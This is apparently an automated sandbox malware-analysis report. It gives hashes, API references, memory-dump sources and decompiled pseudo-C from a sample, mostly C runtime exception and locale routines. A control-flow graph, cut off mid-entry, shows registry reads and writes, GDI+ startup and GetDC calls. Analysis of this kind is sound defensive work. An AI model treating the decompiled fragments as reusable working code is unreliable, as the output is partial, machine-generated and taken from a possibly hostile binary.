                                                • Instruction ID: 8cf329f3307e7024996514bb84dd6eb5a569157020c81124bd42c155a10be4d5
                                                • Opcode Fuzzy Hash: 49c675150a30634a57cd49c4609202d68240526557c3fc5b1c7bce48b582cab7
                                                • Instruction Fuzzy Hash: 99419871E00224AFDB11EF99AC85E9EB7F8EF85710B20005BF41697653D6718E40EB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E00C1A3D0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				char _v5;
                                                				signed int _v12;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				char _v32;
                                                				char _t52;
                                                				signed int _t59;
                                                				intOrPtr _t60;
                                                				void* _t61;
                                                				intOrPtr* _t62;
                                                				intOrPtr _t64;
                                                				intOrPtr _t66;
                                                				intOrPtr _t67;
                                                				intOrPtr _t72;
                                                				intOrPtr* _t76;
                                                				intOrPtr _t77;
                                                				signed int _t81;
                                                				char _t83;
                                                				intOrPtr _t86;
                                                				intOrPtr _t93;
                                                				intOrPtr _t96;
                                                				intOrPtr* _t98;
                                                				void* _t102;
                                                				void* _t104;
                                                				void* _t111;
                                                
                                                				_t89 = __edx;
                                                				_t76 = _a4;
                                                				_push(__edi);
                                                				_v5 = 0;
                                                				_v16 = 1;
                                                				 *_t76 = E00C32E8B(__ecx,  *_t76);
                                                				_t77 = _a8;
                                                				_t6 = _t77 + 0x10; // 0x11
                                                				_t96 = _t6;
                                                				_push(_t96);
                                                				_v20 = _t96;
                                                				_v12 =  *(_t77 + 8) ^  *0xc42014;
                                                				E00C1A390(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0xc42014);
                                                				E00C1B46C(_a12);
                                                				_t52 = _a4;
                                                				_t104 = _t102 - 0x1c + 0x10;
                                                				_t93 =  *((intOrPtr*)(_t77 + 0xc));
                                                				if(( *(_t52 + 4) & 0x00000066) != 0) {
                                                					__eflags = _t93 - 0xfffffffe;
                                                					if(_t93 != 0xfffffffe) {
                                                						_t89 = 0xfffffffe;
                                                						E00C1B5F0(_t77, 0xfffffffe, _t96, 0xc42014);
                                                						goto L13;
                                                					}
                                                					goto L14;
                                                				} else {
                                                					_v32 = _t52;
                                                					_v28 = _a12;
                                                					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
                                                					if(_t93 == 0xfffffffe) {
                                                						L14:
                                                						return _v16;
                                                					} else {
                                                						do {
                                                							_t81 = _v12;
                                                							_t59 = _t93 + (_t93 + 2) * 2;
                                                							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
                                                							_t60 = _t81 + _t59 * 4;
                                                							_t82 =  *((intOrPtr*)(_t60 + 4));
                                                							_v24 = _t60;
                                                							if( *((intOrPtr*)(_t60 + 4)) == 0) {
                                                								_t83 = _v5;
                                                								goto L7;
                                                							} else {
                                                								_t89 = _t96;
                                                								_t61 = E00C1B590(_t82, _t96);
                                                								_t83 = 1;
                                                								_v5 = 1;
                                                								_t111 = _t61;
                                                								if(_t111 < 0) {
                                                									_v16 = 0;
                                                									L13:
                                                									_push(_t96);
                                                									E00C1A390(_t77, _t89, _t93, _t96, _v12);
                                                									goto L14;
                                                								} else {
                                                									if(_t111 > 0) {
                                                										_t62 = _a4;
                                                										__eflags =  *_t62 - 0xe06d7363;
                                                										if( *_t62 == 0xe06d7363) {
                                                											__eflags =  *0xc350d0;
                                                											if(__eflags != 0) {
                                                												_t72 = E00C32770(__eflags, 0xc350d0);
                                                												_t104 = _t104 + 4;
                                                												__eflags = _t72;
                                                												if(_t72 != 0) {
                                                													_t98 =  *0xc350d0; // 0xc189e8
                                                													 *0xc34138(_a4, 1);
                                                													 *_t98();
                                                													_t96 = _v20;
                                                													_t104 = _t104 + 8;
                                                												}
                                                												_t62 = _a4;
                                                											}
                                                										}
                                                										_t90 = _t62;
                                                										E00C1B5D0(_t62, _a8, _t62);
                                                										_t64 = _a8;
                                                										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
                                                										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
                                                											_t90 = _t93;
                                                											E00C1B5F0(_t64, _t93, _t96, 0xc42014);
                                                											_t64 = _a8;
                                                										}
                                                										_push(_t96);
                                                										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
                                                										E00C1A390(_t77, _t90, _t93, _t96, _v12);
                                                										_t86 =  *((intOrPtr*)(_v24 + 8));
                                                										E00C1B5B0();
                                                										asm("int3");
                                                										_t66 = E00C1B607();
                                                										__eflags = _t66;
                                                										if(_t66 != 0) {
                                                											_t67 = E00C1A693(_t86);
                                                											__eflags = _t67;
                                                											if(_t67 != 0) {
                                                												return 1;
                                                											} else {
                                                												E00C1B643();
                                                												goto L24;
                                                											}
                                                										} else {
                                                											L24:
                                                											__eflags = 0;
                                                											return 0;
                                                										}
                                                									} else {
                                                										goto L7;
                                                									}
                                                								}
                                                							}
                                                							goto L28;
                                                							L7:
                                                							_t93 = _t77;
                                                						} while (_t77 != 0xfffffffe);
                                                						if(_t83 != 0) {
                                                							goto L13;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                				L28:
                                                			}






























                                                0x00c1a3d0
                                                0x00c1a3d7
                                                0x00c1a3db
                                                0x00c1a3dc
                                                0x00c1a3e2
                                                0x00c1a3ee
                                                0x00c1a3f0
                                                0x00c1a3f6
                                                0x00c1a3f6
                                                0x00c1a3ff
                                                0x00c1a401
                                                0x00c1a404
                                                0x00c1a407
                                                0x00c1a40f
                                                0x00c1a414
                                                0x00c1a417
                                                0x00c1a41a
                                                0x00c1a421
                                                0x00c1a47d
                                                0x00c1a480
                                                0x00c1a488
                                                0x00c1a48f
                                                0x00000000
                                                0x00c1a48f
                                                0x00000000
                                                0x00c1a423
                                                0x00c1a423
                                                0x00c1a429
                                                0x00c1a42f
                                                0x00c1a435
                                                0x00c1a4a0
                                                0x00c1a4a9
                                                0x00c1a437
                                                0x00c1a437
                                                0x00c1a437
                                                0x00c1a43d
                                                0x00c1a440
                                                0x00c1a443
                                                0x00c1a446
                                                0x00c1a449
                                                0x00c1a44e
                                                0x00c1a464
                                                0x00000000
                                                0x00c1a450
                                                0x00c1a450
                                                0x00c1a452
                                                0x00c1a457
                                                0x00c1a459
                                                0x00c1a45c
                                                0x00c1a45e
                                                0x00c1a474
                                                0x00c1a494
                                                0x00c1a494
                                                0x00c1a498
                                                0x00000000
                                                0x00c1a460
                                                0x00c1a460
                                                0x00c1a4aa
                                                0x00c1a4ad
                                                0x00c1a4b3
                                                0x00c1a4b5
                                                0x00c1a4bc
                                                0x00c1a4c3
                                                0x00c1a4c8
                                                0x00c1a4cb
                                                0x00c1a4cd
                                                0x00c1a4cf
                                                0x00c1a4dc
                                                0x00c1a4e2
                                                0x00c1a4e4
                                                0x00c1a4e7
                                                0x00c1a4e7
                                                0x00c1a4ea
                                                0x00c1a4ea
                                                0x00c1a4bc
                                                0x00c1a4f0
                                                0x00c1a4f2
                                                0x00c1a4f7
                                                0x00c1a4fa
                                                0x00c1a4fd
                                                0x00c1a505
                                                0x00c1a509
                                                0x00c1a50e
                                                0x00c1a50e
                                                0x00c1a511
                                                0x00c1a515
                                                0x00c1a518
                                                0x00c1a525
                                                0x00c1a528
                                                0x00c1a52d
                                                0x00c1a52e
                                                0x00c1a533
                                                0x00c1a535
                                                0x00c1a53a
                                                0x00c1a53f
                                                0x00c1a541
                                                0x00c1a54c
                                                0x00c1a543
                                                0x00c1a543
                                                0x00000000
                                                0x00c1a543
                                                0x00c1a537
                                                0x00c1a537
                                                0x00c1a537
                                                0x00c1a539
                                                0x00c1a539
                                                0x00c1a462
                                                0x00000000
                                                0x00c1a462
                                                0x00c1a460
                                                0x00c1a45e
                                                0x00000000
                                                0x00c1a467
                                                0x00c1a467
                                                0x00c1a469
                                                0x00c1a470
                                                0x00000000
                                                0x00c1a472
                                                0x00000000
                                                0x00c1a470
                                                0x00c1a435
                                                0x00000000

                                                APIs
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00C1A40F
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00C1A4C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 3480331319-1018135373
                                                • Opcode ID: 100ffb374324d435d89c6921d40bad478947cc5b660578601e8e9dac4358207d
                                                • Instruction ID: 79c28d5c48eb2cd582cb785c6a42c88d9cf059f1e7aafb46ea712dd8602bb633
                                                • Opcode Fuzzy Hash: 100ffb374324d435d89c6921d40bad478947cc5b660578601e8e9dac4358207d
                                                • Instruction Fuzzy Hash: 1541C530A012089BCF10DF68C885BDEBBB5BF46324F148155E8259B352D771DE85EF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 65%
                                                			E00C1ACDD(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				intOrPtr* _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				intOrPtr _v28;
                                                				signed int _v36;
                                                				void* _v40;
                                                				intOrPtr _v44;
                                                				signed int _v48;
                                                				intOrPtr _v56;
                                                				void _v60;
                                                				signed char* _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				void* _t74;
                                                				void* _t75;
                                                				char _t76;
                                                				signed char _t78;
                                                				signed int _t80;
                                                				signed char* _t81;
                                                				signed int _t82;
                                                				signed int _t83;
                                                				intOrPtr* _t87;
                                                				void* _t90;
                                                				signed char* _t93;
                                                				intOrPtr* _t96;
                                                				signed char _t97;
                                                				intOrPtr _t98;
                                                				intOrPtr _t99;
                                                				intOrPtr* _t101;
                                                				signed int _t102;
                                                				signed int _t103;
                                                				signed char _t108;
                                                				signed char* _t111;
                                                				signed int _t112;
                                                				void* _t113;
                                                				signed char* _t116;
                                                				void* _t121;
                                                				signed int _t123;
                                                				void* _t130;
                                                				void* _t131;
                                                
                                                				_t110 = __edx;
                                                				_t100 = __ecx;
                                                				_t96 = _a4;
                                                				if( *_t96 == 0x80000003) {
                                                					return _t74;
                                                				} else {
                                                					_t75 = E00C1A5BC(_t96, __ecx, __edx, _t113, _t121, _t113, _t121);
                                                					if( *((intOrPtr*)(_t75 + 8)) != 0) {
                                                						__imp__EncodePointer(0);
                                                						_t121 = _t75;
                                                						if( *((intOrPtr*)(E00C1A5BC(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
                                                							_t87 = E00C18169(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
                                                							_t130 = _t130 + 0x1c;
                                                							if(_t87 != 0) {
                                                								L16:
                                                								return _t87;
                                                							}
                                                						}
                                                					}
                                                					_t76 = _a20;
                                                					_v24 = _t76;
                                                					_v20 = 0;
                                                					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
                                                						_push(_a28);
                                                						E00C1809C(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
                                                						_t112 = _v36;
                                                						_t131 = _t130 + 0x18;
                                                						_t87 = _v40;
                                                						_v16 = _t87;
                                                						_v8 = _t112;
                                                						if(_t112 < _v28) {
                                                							_t102 = _t112 * 0x14;
                                                							_v12 = _t102;
                                                							do {
                                                								_t103 = 5;
                                                								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
                                                								_t131 = _t131 + 0xc;
                                                								if(_v60 <= _t90 && _t90 <= _v56) {
                                                									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
                                                									_t108 = _t93[4];
                                                									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
                                                										if(( *_t93 & 0x00000040) == 0) {
                                                											_push(0);
                                                											_push(1);
                                                											E00C1A8B8(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
                                                											_t112 = _v8;
                                                											_t131 = _t131 + 0x30;
                                                										}
                                                									}
                                                								}
                                                								_t112 = _t112 + 1;
                                                								_t87 = _v16;
                                                								_t102 = _v12 + 0x14;
                                                								_v8 = _t112;
                                                								_v12 = _t102;
                                                							} while (_t112 < _v28);
                                                						}
                                                						goto L16;
                                                					}
                                                					E00C200C9(_t96, _t100, _t110, 0, _t121);
                                                					asm("int3");
                                                					_t111 = _v68;
                                                					_push(_t96);
                                                					_push(_t121);
                                                					_push(0);
                                                					_t78 = _t111[4];
                                                					if(_t78 == 0) {
                                                						L41:
                                                						_t80 = 1;
                                                					} else {
                                                						_t101 = _t78 + 8;
                                                						if( *_t101 == 0) {
                                                							goto L41;
                                                						} else {
                                                							_t116 = _a4;
                                                							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
                                                								_t97 = _t116[4];
                                                								_t123 = 0;
                                                								if(_t78 == _t97) {
                                                									L33:
                                                									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
                                                										_t81 = _a8;
                                                										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
                                                											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
                                                												_t123 = 1;
                                                											}
                                                										}
                                                									}
                                                									_t80 = _t123;
                                                								} else {
                                                									_t59 = _t97 + 8; // 0x6e
                                                									_t82 = _t59;
                                                									while(1) {
                                                										_t98 =  *_t101;
                                                										if(_t98 !=  *_t82) {
                                                											break;
                                                										}
                                                										if(_t98 == 0) {
                                                											L29:
                                                											_t83 = _t123;
                                                										} else {
                                                											_t99 =  *((intOrPtr*)(_t101 + 1));
                                                											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
                                                												break;
                                                											} else {
                                                												_t101 = _t101 + 2;
                                                												_t82 = _t82 + 2;
                                                												if(_t99 != 0) {
                                                													continue;
                                                												} else {
                                                													goto L29;
                                                												}
                                                											}
                                                										}
                                                										L31:
                                                										if(_t83 == 0) {
                                                											goto L33;
                                                										} else {
                                                											_t80 = 0;
                                                										}
                                                										goto L42;
                                                									}
                                                									asm("sbb eax, eax");
                                                									_t83 = _t82 | 0x00000001;
                                                									goto L31;
                                                								}
                                                							} else {
                                                								goto L41;
                                                							}
                                                						}
                                                					}
                                                					L42:
                                                					return _t80;
                                                				}
                                                			}















































                                                0x00c1acdd
                                                0x00c1acdd
                                                0x00c1ace4
                                                0x00c1aced
                                                0x00c1ae0c
                                                0x00c1acf3
                                                0x00c1acf5
                                                0x00c1acff
                                                0x00c1ad02
                                                0x00c1ad08
                                                0x00c1ad12
                                                0x00c1ad37
                                                0x00c1ad3c
                                                0x00c1ad41
                                                0x00c1ae08
                                                0x00000000
                                                0x00c1ae09
                                                0x00c1ad41
                                                0x00c1ad12
                                                0x00c1ad47
                                                0x00c1ad4a
                                                0x00c1ad4d
                                                0x00c1ad53
                                                0x00c1ad59
                                                0x00c1ad6b
                                                0x00c1ad70
                                                0x00c1ad73
                                                0x00c1ad76
                                                0x00c1ad79
                                                0x00c1ad7c
                                                0x00c1ad82
                                                0x00c1ad88
                                                0x00c1ad8b
                                                0x00c1ad8e
                                                0x00c1ad9d
                                                0x00c1ad9e
                                                0x00c1ad9e
                                                0x00c1ada3
                                                0x00c1adb6
                                                0x00c1adb8
                                                0x00c1adbd
                                                0x00c1adc8
                                                0x00c1adca
                                                0x00c1adcc
                                                0x00c1ade8
                                                0x00c1aded
                                                0x00c1adf0
                                                0x00c1adf0
                                                0x00c1adc8
                                                0x00c1adbd
                                                0x00c1adf6
                                                0x00c1adf7
                                                0x00c1adfa
                                                0x00c1adfd
                                                0x00c1ae00
                                                0x00c1ae03
                                                0x00c1ad8e
                                                0x00000000
                                                0x00c1ad82
                                                0x00c1ae0d
                                                0x00c1ae12
                                                0x00c1ae16
                                                0x00c1ae19
                                                0x00c1ae1a
                                                0x00c1ae1b
                                                0x00c1ae1c
                                                0x00c1ae21
                                                0x00c1ae99
                                                0x00c1ae9b
                                                0x00c1ae23
                                                0x00c1ae23
                                                0x00c1ae29
                                                0x00000000
                                                0x00c1ae2b
                                                0x00c1ae2e
                                                0x00c1ae31
                                                0x00c1ae38
                                                0x00c1ae3b
                                                0x00c1ae3f
                                                0x00c1ae71
                                                0x00c1ae74
                                                0x00c1ae7b
                                                0x00c1ae81
                                                0x00c1ae8b
                                                0x00c1ae94
                                                0x00c1ae94
                                                0x00c1ae8b
                                                0x00c1ae81
                                                0x00c1ae95
                                                0x00c1ae41
                                                0x00c1ae41
                                                0x00c1ae41
                                                0x00c1ae44
                                                0x00c1ae44
                                                0x00c1ae48
                                                0x00000000
                                                0x00000000
                                                0x00c1ae4c
                                                0x00c1ae60
                                                0x00c1ae60
                                                0x00c1ae4e
                                                0x00c1ae4e
                                                0x00c1ae54
                                                0x00000000
                                                0x00c1ae56
                                                0x00c1ae56
                                                0x00c1ae59
                                                0x00c1ae5e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1ae5e
                                                0x00c1ae54
                                                0x00c1ae69
                                                0x00c1ae6b
                                                0x00000000
                                                0x00c1ae6d
                                                0x00c1ae6d
                                                0x00c1ae6d
                                                0x00000000
                                                0x00c1ae6b
                                                0x00c1ae64
                                                0x00c1ae66
                                                0x00000000
                                                0x00c1ae66
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1ae31
                                                0x00c1ae29
                                                0x00c1ae9c
                                                0x00c1aea0
                                                0x00c1aea0

                                                APIs
                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00C1AD02
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EncodePointer
                                                • String ID: MOC$RCC
                                                • API String ID: 2118026453-2084237596
                                                • Opcode ID: 08955a9e27dc6e89ecb27d5ee3e9b2e5e01b54b923bd3dee61d9c1a9be7caae8
                                                • Instruction ID: a5270d49a1884ba107af063b13117175cccab4497ed68ec041c2c2f853cfbf86
                                                • Opcode Fuzzy Hash: 08955a9e27dc6e89ecb27d5ee3e9b2e5e01b54b923bd3dee61d9c1a9be7caae8
                                                • Instruction Fuzzy Hash: 1941AC72901209EFCF16DF94DD81AEEBBB5FF09301F154099F91467211D3319AA1EB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E00C11890(signed int* __ecx, void* __esi) {
                                                				intOrPtr _v0;
                                                				signed int _t37;
                                                				signed int* _t51;
                                                				signed int* _t55;
                                                				signed int* _t56;
                                                				void* _t59;
                                                				void* _t60;
                                                
                                                				_t50 = __ecx;
                                                				_t55 = __ecx;
                                                				E00C153B9(__ecx, 0);
                                                				__ecx[1] = 0;
                                                				__ecx[6] = 0;
                                                				__ecx[7] = 0;
                                                				__ecx[8] = 0;
                                                				__ecx[9] = 0;
                                                				__ecx[0xa] = 0;
                                                				__ecx[0xb] = 0;
                                                				__ecx[0xc] = 0;
                                                				_t28 = _v0;
                                                				__ecx[2] = 0;
                                                				__ecx[3] = 0;
                                                				__ecx[4] = 0;
                                                				__ecx[5] = 0;
                                                				if(_v0 == 0) {
                                                					E00C15580("bad locale name");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					_push(_t55);
                                                					_t56 = _t50;
                                                					E00C15857(_t50, _t56);
                                                					_t31 = _t56[0xb];
                                                					_t60 = _t59 + 4;
                                                					if(_t56[0xb] != 0) {
                                                						E00C1CD40(_t31);
                                                						_t60 = _t60 + 4;
                                                					}
                                                					_t56[0xb] = 0;
                                                					_t32 = _t56[9];
                                                					if(_t56[9] != 0) {
                                                						E00C1CD40(_t32);
                                                						_t60 = _t60 + 4;
                                                					}
                                                					_t56[9] = 0;
                                                					_t33 = _t56[7];
                                                					if(_t56[7] != 0) {
                                                						E00C1CD40(_t33);
                                                						_t60 = _t60 + 4;
                                                					}
                                                					_t56[7] = 0;
                                                					_t34 = _t56[5];
                                                					if(_t56[5] != 0) {
                                                						E00C1CD40(_t34);
                                                						_t60 = _t60 + 4;
                                                					}
                                                					_t56[5] = 0;
                                                					_t35 = _t56[3];
                                                					if(_t56[3] != 0) {
                                                						E00C1CD40(_t35);
                                                						_t60 = _t60 + 4;
                                                					}
                                                					_t56[3] = 0;
                                                					_t36 = _t56[1];
                                                					if(_t56[1] != 0) {
                                                						E00C1CD40(_t36);
                                                					}
                                                					_t56[1] = 0;
                                                					_t51 = _t56;
                                                					_t37 =  *_t51;
                                                					if(_t37 == 0) {
                                                						return E00C1DAC4(4);
                                                					} else {
                                                						if(_t37 < 8) {
                                                							return E00C16F53(0xc98a90 + _t37 * 0x18, 0xc98a90 + _t37 * 0x18);
                                                						}
                                                						return _t37;
                                                					}
                                                				} else {
                                                					E00C1580C(__ecx, __ecx, _t28);
                                                					return _t55;
                                                				}
                                                			}










                                                0x00c11890
                                                0x00c11893
                                                0x00c11895
                                                0x00c1189c
                                                0x00c118a3
                                                0x00c118a7
                                                0x00c118aa
                                                0x00c118ae
                                                0x00c118b1
                                                0x00c118b4
                                                0x00c118b7
                                                0x00c118ba
                                                0x00c118be
                                                0x00c118c2
                                                0x00c118c9
                                                0x00c118cd
                                                0x00c118d6
                                                0x00c118ed
                                                0x00c118f2
                                                0x00c118f3
                                                0x00c118f4
                                                0x00c118f5
                                                0x00c118f6
                                                0x00c118f7
                                                0x00c118f8
                                                0x00c118f9
                                                0x00c118fa
                                                0x00c118fb
                                                0x00c118fc
                                                0x00c118fd
                                                0x00c118fe
                                                0x00c118ff
                                                0x00c11900
                                                0x00c11901
                                                0x00c11904
                                                0x00c11909
                                                0x00c1190c
                                                0x00c11911
                                                0x00c11914
                                                0x00c11919
                                                0x00c11919
                                                0x00c1191c
                                                0x00c11923
                                                0x00c11928
                                                0x00c1192b
                                                0x00c11930
                                                0x00c11930
                                                0x00c11933
                                                0x00c1193a
                                                0x00c1193f
                                                0x00c11942
                                                0x00c11947
                                                0x00c11947
                                                0x00c1194a
                                                0x00c11951
                                                0x00c11956
                                                0x00c11959
                                                0x00c1195e
                                                0x00c1195e
                                                0x00c11961
                                                0x00c11968
                                                0x00c1196d
                                                0x00c11970
                                                0x00c11975
                                                0x00c11975
                                                0x00c11978
                                                0x00c1197f
                                                0x00c11984
                                                0x00c11987
                                                0x00c1198c
                                                0x00c1198f
                                                0x00c11996
                                                0x00c15411
                                                0x00c15415
                                                0x00c1daf1
                                                0x00c1541b
                                                0x00c1541e
                                                0x00000000
                                                0x00c1542e
                                                0x00c1542f
                                                0x00c1542f
                                                0x00c118d8
                                                0x00c118da
                                                0x00c118e5
                                                0x00c118e5

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00C11895
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C118DA
                                                  • Part of subcall function 00C1580C: _Yarn.LIBCPMT ref: 00C1582B
                                                  • Part of subcall function 00C1580C: _Yarn.LIBCPMT ref: 00C1584F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                • String ID: bad locale name
                                                • API String ID: 1908188788-1405518554
                                                • Opcode ID: 743a0ae3055aaf9e80220e7855f45f9a014646201f4a64d675400f5b9ce13c15
                                                • Instruction ID: 4380d0e353f90d935421bb50f37d66eeff18ba61c10f2f57504bf3d210a2540d
                                                • Opcode Fuzzy Hash: 743a0ae3055aaf9e80220e7855f45f9a014646201f4a64d675400f5b9ce13c15
                                                • Instruction Fuzzy Hash: 65F01DB1515B408ED370DF79C404787BAE0AF26310F048E2DD5DAC7A51E375E548DBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 dd2da0-dd2e06 call dd2b70 call dd2c10 call dd2890 6 dd2e0b-dd2e11 0->6 7 dd2e3f-dd2e45 6->7 8 dd2e13-dd2e1f 6->8 11 dd2e6f-dd2e75 7->11 12 dd2e47-dd2e53 7->12 9 dd2e35-dd2e3c call de8dbf 8->9 10 dd2e21-dd2e2f 8->10 9->7 10->9 13 dd2ebb-dd2f54 call ded41c call de9e10 RegOpenKeyExA 10->13 17 dd2e9f-dd2eba call de8932 11->17 18 dd2e77-dd2e83 11->18 15 dd2e65-dd2e6c call de8dbf 12->15 16 dd2e55-dd2e63 12->16 33 dd2f56-dd2f7a RegQueryValueExA 13->33 34 dd2f80-dd2fa3 RegCloseKey 13->34 15->11 16->13 16->15 23 dd2e95-dd2e9c call de8dbf 18->23 24 dd2e85-dd2e93 18->24 23->17 24->13 24->23 33->34 35 dd2fa6-dd2fab 34->35 35->35 36 dd2fad-dd2fc4 call de76c0 35->36 39 dd2fee-dd3006 36->39 40 dd2fc6-dd2fd2 36->40 43 dd3008-dd3014 39->43 44 dd3030-dd304c call de8932 39->44 41 dd2fe4-dd2feb call de8dbf 40->41 42 dd2fd4-dd2fe2 40->42 41->39 42->41 45 dd304d-dd309b call ded41c RegOpenKeyExA 42->45 47 dd3026-dd302d call de8dbf 43->47 48 dd3016-dd3024 43->48 57 dd309d-dd30c1 RegSetValueExA 45->57 58 dd30c7-dd30d6 RegCloseKey 45->58 47->44 48->45 48->47 57->58 59 dd30d8-dd30e4 58->59 60 dd3104-dd311c 58->60 61 dd30fa-dd3101 call de8dbf 59->61 62 dd30e6-dd30f4 59->62 63 dd311e-dd312a 60->63 64 dd3146-dd315e 60->64 61->60 62->61 67 dd3196-dd325d call ded41c GdiplusStartup call de72d0 62->67 69 dd313c-dd3143 call de8dbf 63->69 70 dd312c-dd313a 63->70 65 dd3188-dd3195 call de8932 64->65 66 dd3160-dd316c 64->66 71 dd317e-dd3185 call de8dbf 66->71 72 dd316e-dd317c 66->72 85 dd325f-dd3262 67->85 86 dd32d3-dd32db 67->86 69->64 70->67 70->69 71->65 72->67 72->71 85->86 87 dd3264-dd326b 85->87 88 dd32dd 86->88 89 dd32f0-dd33d9 GetDC call de7200 call dd2da0 call de7200 call dd2da0 call de7200 call dd2da0 call dd2ed0 call de7200 call dd2da0 call de7810 * 2 86->89 90 dd326d-dd3275 87->90 91 dd3277-dd327a 87->91 92 dd32e0-dd32ee 88->92 116 dd33db-dd33ea 89->116 117 dd340a-dd3432 89->117 90->86 90->91 94 dd3280-dd32d1 91->94 92->89 92->92 94->86 94->94 118 dd33ec-dd33fa 116->118 119 dd3400-dd3407 call de8dbf 116->119 120 dd3434-dd3443 117->120 121 dd3463-dd348b 117->121 118->119 122 